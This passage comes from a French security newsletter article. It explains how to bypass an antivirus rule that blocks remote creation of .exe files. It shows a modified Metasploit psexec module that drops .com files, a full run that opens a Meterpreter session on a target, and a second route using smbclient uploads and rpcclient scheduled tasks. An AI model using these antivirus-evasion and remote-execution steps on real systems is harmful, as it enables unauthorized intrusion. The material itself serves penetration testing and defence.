exécutables et de configuration
La consultation des journaux sur la machine incriminée permet de s'assurer du
problème :
16/02/2012 15:55:21 Bloqué par une règle de protection de l'accès DOMAIN\ADMIN
System:Remote C:\executable.exe Protection standard antivirus:Empêcher la
création/ modification à distance de fichiers exécutables et de configuration
Action bloquée : Créer
Pourquoi Psexec est alors concerné ? Parce que psexec copie tout d'abord un
exécutable puis le lance comme un service. Il n'échappe donc pas à la règle.
Toutefois, cette restriction ne concerne que les fichiers possédant
l'extension ".exe". Ainsi, le dépôt de fichier .com est autorisé. Il est
alors possible de modifier le script de psexec pour pouvoir effectuer cette
action automatiquement :
Iv at zener:exploits/windows/smb>diff psexec.rb psexec2.rb
141c141
< filename = rand_text_alpha(8) + ".exe"
---
> filename = rand_text_alpha(8) + ".com"
160c160
< filename = rand_text_alpha(8) + ".exe"
---
> filename = rand_text_alpha(8) + ".com"
Son utilisation permet ensuite de lancer une charge utile comme meterpreter :
msf > use exploit/windows/smb/psexec2
msf exploit(psexec2) > set SMBUser ADMIN
SMBUser => ADMIN
msf exploit(psexec2) > set SMBPass password
SMBPass => password
msf exploit(psexec2) > set SMBDomain DOMIN
SMBDomain => DOMAIN
msf exploit(psexec2) > set RHOST 10.0.0.1
RHOST => 10.0.0.1
msf exploit(psexec2) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(psexec2) > set SHARE C$\\hsc
SHARE => C$\hsc
msf exploit(psexec2) > exploit
[*] Connecting to the server...
[*] Started bind handler
[*] Authenticating to 10.0.0.1:445|DOMAIN as user 'ADMIN'...
[*] Uploading payload...
[*] Created \hsc\rTRLwkjB.com...
[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0 at ncacn_np:10.0.0.1[\svcctl] ...
[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0 at ncacn_np:10.0.0.1[\svcctl] ...
[*] Obtaining a service manager handle...
[*] Creating a new service (RXcdXybp - "MoZfZPGYhMSBIXyPIdFjfsx")...
[*] Closing service handle...
[*] Opening service...
[*] Starting the service...
[*] Removing the service...
[*] Closing service handle...
[*] Deleting \rTRLwkjB.com...
[*] Sending stage (752128 bytes) to 10.0.0.1
[*] Meterpreter session 1 opened (10.0.0.2:38235 -> 10.0.0.1:4444) at Fri Feb 17 11:33:38 +0100 2012
meterpreter >
Une autre solution consiste à copier un exécutable via smbclient puis à
l'exécuter via rpcclient (depuis Linux) :
Iv at zener:~>smbclient -U 'DOMAIN\ADMIN%password' //10.0.0.1/C$
Domain=[DOMAIN] OS=[Windows 5.1] Server=[Windows 2000 LAN Manager]
smb: \> mkdir hsc
smb: \> cd hsc
smb: \hsc\> put executable.com
putting file executable.com as \hsc\executable.com (6517.7 kb/s) (average 6517.8 kb/s)
La création de service n'étant pas intégrée à samba ou samba-tng, il faut
passer par les tâches planifiées pour lancer l'exécutable :
[DOMAIN\ADMIN at 10.0.0.1]$ at 11:08:00 /interactive "c:\hsc\executable.com"
Job Information:
----------------
Time: 11:08:00
Schedule: Once
Status: OK
Interactive: Yes
Command: c:\hsc\executable.com
Job ID: 1
Le programme sera ensuite lancé à l'heure précisée.
-- Yves Le Provost
Plus d'informations sur la liste de diffusion newsletter